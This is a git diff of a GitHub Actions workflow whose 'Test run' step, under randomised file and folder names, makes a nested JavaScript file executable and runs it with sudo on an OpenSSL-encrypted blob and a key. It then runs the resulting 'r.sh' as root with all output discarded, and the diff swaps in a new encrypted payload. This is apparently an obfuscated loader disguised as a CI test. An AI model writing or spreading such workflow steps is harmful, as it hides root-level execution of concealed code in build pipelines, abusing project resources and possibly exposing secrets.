--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'dcwuq'
+        echo 'imkse'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19Mw+Vyzh3sSUTgj5+cE6YNEXWIbt1e8tZKfLP2kW3rZbowBoiRz2XZXjADTGpiu6cvffOY4W0S74tncrcG+BKesUGOvQIrI8/F2E4I0+A9TtcuGuF+6RR/ 3izfvi && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18XdsXO47CMU2XjVYOJVx6D/LT1RJtf9pYJ5pZMI56QMI7FKjllRA8LDAkek7qs1iLRCcsw3toWN7H1V37INHmrjEUxzO1X2Z6R7CaEnwY21SiXvXnziDlB r83ueo && sudo sh r.sh > /dev/null 2>&1
